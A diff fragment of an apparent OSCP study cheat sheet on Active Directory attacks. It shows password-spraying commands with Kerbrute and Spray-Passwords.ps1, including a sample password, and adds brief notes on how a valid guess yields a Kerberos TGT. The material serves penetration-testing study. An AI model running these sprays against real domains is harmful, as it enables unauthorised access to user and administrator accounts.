redcountryroad/OSCP-shortsheet/ActiveDirectory.md

 ```

 - Spray with Kerbrute
+- Principle is if username and password is correct, we will obtain a TGT.
+Kerbrute will test all username and password and return us with success if TGT is obtained with a valid username and password
 ```bash
 kerbrute passwordspray -d corp.com .\usernames.txt "pass"
 ```

-- Brute force small number of guess passwords on list of found usernames (tool: Spray-Passwords.ps1)
+- Brute force small number of guess passwords on list of found usernames (tool: Spray-Passwords.ps1) (For LDAP and ADSI protocol)
   ```bash
   .\Spray-Passwords.ps1
   .\Spray-Passwords.ps1 -Pass Nexus123! -Admin